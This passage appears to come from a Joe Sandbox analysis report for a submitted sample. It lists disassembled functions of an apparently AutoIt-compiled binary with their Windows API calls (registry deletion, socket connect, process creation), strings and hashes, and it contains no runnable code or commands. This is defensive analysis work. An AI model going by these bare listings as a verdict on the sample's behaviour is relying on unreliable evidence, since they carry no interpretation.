                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: 3c416c169d949de98254f2bbe971242bfff6ad514216b2137d3ea9ab1ef2c435
                                                          • Instruction ID: e5549a6b30d6fccdcb70cc21594739bffe9168e94da6da47edba9d6522e26ae1
                                                          • Instruction Fuzzy Hash: 9C41A3A5C2091875CB12EBB498469DFB7BCEF06310F11C866F518E7165E734E744C3A9
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039D8E3
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0039D919
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0039D92A
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0039D9AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: ,,=$DllGetClassObject
                                                          • API String ID: 753597075-4126740902
                                                          • Opcode ID: 6658a01decbb5eade28b4d0ce0fc86a2ef74728db69a83d48c2064a1b33ba15f
                                                          • Instruction ID: a026904ab3c7fd1ef268e6b0dd435bed63c4c5f53232bf208b13ddead4550b76
                                                          • Instruction Fuzzy Hash: 98418E72600204EFDF06EF55C885AAABBB9EF45314F1581A9ED06DF205D7B1DE40CBA0
                                                          APIs
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003A36DB,?), ref: 003A46CC
                                                            • Part of subcall function 003A46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003A36DB,?), ref: 003A46E5
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003A36FB
                                                          • _wcscmp.LIBCMT ref: 003A3717
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A372F
                                                          • _wcscat.LIBCMT ref: 003A3777
                                                          • SHFileOperationW.SHELL32(?), ref: 003A37E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: 8d5f058d22cb94928955436c12895b6fde4f0c6db4c7fe40aa6d84e3160559e4
                                                          • Instruction ID: c5d058e57226b9c8c375aeb933dd081411fd46de04168f0dea8ea066fc1b3f5f
                                                          • Instruction Fuzzy Hash: AE417CB2508344AEC753EF64D441ADBB7ECEF8A340F00092EF49AC7161EA35D688C756
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C72DC
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C7383
                                                          • IsMenu.USER32(?), ref: 003C739B
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C73E3
                                                          • DrawMenuBar.USER32 ref: 003C73F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 9c2e48db6629026da4f4c93866a69b482f6efa0698ffc6384a41e1f4777ee373
                                                          • Instruction ID: 0ac2ed1505a43c5b196263bb6729ee49176d27433d77683e316089eed6c2b64b
                                                          • Instruction Fuzzy Hash: FA413675A04208EFDB22DF51D884E9ABBF9FB09314F058029ED15EB260D730AD50DFA0
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003C105C
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C1086
                                                          • FreeLibrary.KERNEL32(00000000), ref: 003C113D
                                                            • Part of subcall function 003C102D: RegCloseKey.ADVAPI32(?), ref: 003C10A3
                                                            • Part of subcall function 003C102D: FreeLibrary.KERNEL32(?), ref: 003C10F5
                                                            • Part of subcall function 003C102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003C1118
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 003C10E0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: a140502f9ecde0273c7d767af2bb9849dde5248a83eed1513a375abba0110c2b
                                                          • Instruction ID: 423fc995802f204ed723158abd890d39b62bbb1e7d0b41746307e902072f07ab
                                                          • Instruction Fuzzy Hash: BA310D71901119BFDB16DB94DC89EFEB7BCEF09340F044169E501E2151DA74AE85ABA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C631E
                                                          • GetWindowLongW.USER32(01745310,000000F0), ref: 003C6351
                                                          • GetWindowLongW.USER32(01745310,000000F0), ref: 003C6386
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C63B8
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C63E2
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 003C63F3
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C640D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 71c3d853eefee305252e9dc9b61cec1b54e99826b4924a48f841180b27f85164
                                                          • Instruction ID: 83c70eb1bc918c7fecf1255552c85062d5f986acf78d0b9791b5cc4d89ec727c
                                                          • Instruction Fuzzy Hash: F931F235604290AFDB22DF18EC86F5937E5FB4A710F1A41A8F900DF2B2CB72AC509B51
                                                          APIs
                                                            • Part of subcall function 003B7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7ECB
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003B62DC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B62EB
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6324
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 003B632D
                                                          • WSAGetLastError.WSOCK32 ref: 003B6337
                                                          • closesocket.WSOCK32(00000000), ref: 003B6360
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003B6379
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 9c7443c0f8b014901b7e3ee522dc91d5d7c2ae92665f9ecdc55696276589074f
                                                          • Instruction ID: c56b69fae234801fa1954a26dda18d84c694d965c952fd03d9600b5d320dcb30
                                                          • Instruction Fuzzy Hash: A031A135600218AFDB129F64CC86FFE77EDEB44764F054029FA09DB291DB74AC048BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: e4aca7f3fa428bbc3f9c5d2adc82bb1cf9575187d0aef03361d12a2477a4e6ed
                                                          • Instruction ID: 04023970915e01757058c79e2ccedd96a59c347feb19a18182469f62a7281645
                                                          • Instruction Fuzzy Hash: E72129331086127EDB37AA259C02FBB73DCDF65714F508036F88ACE586EB919D42C6A5
                                                          APIs
                                                            • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                            • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                            • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003C7664
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003C7671
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003C767C
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003C768B
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003C7697
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: b43366b2db9c3c2cc178c4696b9d99f4c51bd674ebe2ce4c0a3a816b6f1d5b44
                                                          • Instruction ID: aff52a97e7b55aa00eb5f04b32f0f46055c2988f6e5bf8bf8b6164af33156436
                                                          • Instruction Fuzzy Hash: DA11B2B211021DBFEF129F64CC85EE77F6DEF087A8F014115BA04A6090C772AC21DBA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 003CB678
                                                          • _memset.LIBCMT ref: 003CB687
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00406F20,00406F64), ref: 003CB6B6
                                                          • CloseHandle.KERNEL32 ref: 003CB6C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID: o@$do@
                                                          • API String ID: 3277943733-129461833
                                                          • Opcode ID: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                          • Instruction ID: fa206ecf758a1873a69ee9f3baa5274a6280b1ec91c60e6d0142d9515ce3caa4
                                                          • Opcode Fuzzy Hash: fde221d828e6c92d3a7aca4eb7efbe09f05a6c650b1cea1cc2ff2dd27acc3380
                                                          • Instruction Fuzzy Hash: 38F089B15403057EE2113771BC06F777A9DEB08354F018035BA09F9195DB755C2087AC
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003641D2,?), ref: 00364123
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0036412A
                                                          • EncodePointer.KERNEL32(00000000), ref: 00364136
                                                          • DecodePointer.KERNEL32(00000001,003641D2,?), ref: 00364153
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoInitialize$combase.dll
                                                          • API String ID: 3489934621-340411864
                                                          • Opcode ID: 4173b6417b975a67868ff532acde0266d5084b7cb5338049cc567f98105fbcbf
                                                          • Instruction ID: 68ad7c4bd8c22d2423d69b8861e6b86e2409e80c855f4479095be5ef9b30b494
                                                          • Opcode Fuzzy Hash: 4173b6417b975a67868ff532acde0266d5084b7cb5338049cc567f98105fbcbf
                                                          • Instruction Fuzzy Hash: 62E01A74A90340AEEB125F70ED09F453AAEB75AB03F108434F411E91A0DBB56184CF04
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003640F8), ref: 003641F8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 003641FF
                                                          • EncodePointer.KERNEL32(00000000), ref: 0036420A
                                                          • DecodePointer.KERNEL32(003640F8), ref: 00364225
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                          • Instruction ID: dd2a82809768aff51818204d3bf12b832cf57925b80e49b79699c811e352736f
                                                          • Opcode Fuzzy Hash: 4775ddb550a28a425729351f3a9145c9eda64578ba87a1e632f40e390fa2a173
                                                          • Instruction Fuzzy Hash: B5E0B674981300AFEB129F61EE0DF463EAEBB18743F254435F111E91A4CFB69604CB18
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 7fe6833ffc20f216a3d564ae34438bba101dc299b41390e98e0434201a377c08
                                                          • Instruction ID: a10ae6ed7e6e858a78b2f66037b140d9ff42dd0ee128887b190f955cbecd626f
                                                          • Opcode Fuzzy Hash: 7fe6833ffc20f216a3d564ae34438bba101dc299b41390e98e0434201a377c08
                                                          • Instruction Fuzzy Hash: 68618C7050065A9BCF17EF60C882EFF77A8EF46308F094559F8556F2A2DB75A901CB90
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0348
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003C0388
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003C03AB
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003C03D4
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003C0417
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0424
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: a52f36c4321a0a017da222b4664d6a7d46e3b0041dade95dad08e5bb07b434e2
                                                          • Instruction ID: 9c50d9bbe6e5809b64927fd0b52b0cb14b6557307550d195f9fe10dbdaf4bcab
                                                          • Opcode Fuzzy Hash: a52f36c4321a0a017da222b4664d6a7d46e3b0041dade95dad08e5bb07b434e2
                                                          • Instruction Fuzzy Hash: F3513831208240EFC71AEB64C885E6BBBE9FF85714F04891DF5959B2A2DB31E905CB52
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 003C5864
                                                          • GetMenuItemCount.USER32(00000000), ref: 003C589B
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003C58C3
                                                          • GetMenuItemID.USER32(?,?), ref: 003C5932
                                                          • GetSubMenu.USER32(?,?), ref: 003C5940
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 003C5991
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 0378466178c231fea9b5b9339838d11b4496613da034e8d03c7613fb9ec9dcae
                                                          • Instruction ID: 46545007161ffac932e94375a8dd858b5eebef5ff21807a1d939edb19cceb7f2
                                                          • Opcode Fuzzy Hash: 0378466178c231fea9b5b9339838d11b4496613da034e8d03c7613fb9ec9dcae
                                                          • Instruction Fuzzy Hash: 10514A31A00615EFCB16AFA4C845AAEB7B5EF48320F1544A9E955FB351CB70BE818B90
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 0039F218
                                                          • VariantClear.OLEAUT32(00000013), ref: 0039F28A
                                                          • VariantClear.OLEAUT32(00000000), ref: 0039F2E5
                                                          • _memmove.LIBCMT ref: 0039F30F
                                                          • VariantClear.OLEAUT32(?), ref: 0039F35C
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0039F38A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 08162b35d7d8a404a78766ff0881fffe1642d636ca89df8cbd5e013ac27356da
                                                          • Instruction ID: afdca31ac79a52ca91486d00e4d5b58691ab8790e0ce2d5c048bf45392227914
                                                          • Opcode Fuzzy Hash: 08162b35d7d8a404a78766ff0881fffe1642d636ca89df8cbd5e013ac27356da
                                                          • Instruction Fuzzy Hash: 675148B9A00209EFCB15DF58C884AAAB7B8FF4C314F15856AE959DB300D734E951CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2550
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A259B
                                                          • IsMenu.USER32(00000000), ref: 003A25BB
                                                          • CreatePopupMenu.USER32 ref: 003A25EF
                                                          • GetMenuItemCount.USER32(000000FF), ref: 003A264D
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003A267E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                          • Instruction ID: 6150242453dad57f7f49b526cb8989a448d764f30cd086a957591ac14cd2af70
                                                          • Opcode Fuzzy Hash: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                                          • Instruction Fuzzy Hash: 9B519E70A02205DFCF26CF6CD988AAFBBF9FF46314F154159E8119B2A0DBB09904CB51
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0034179A
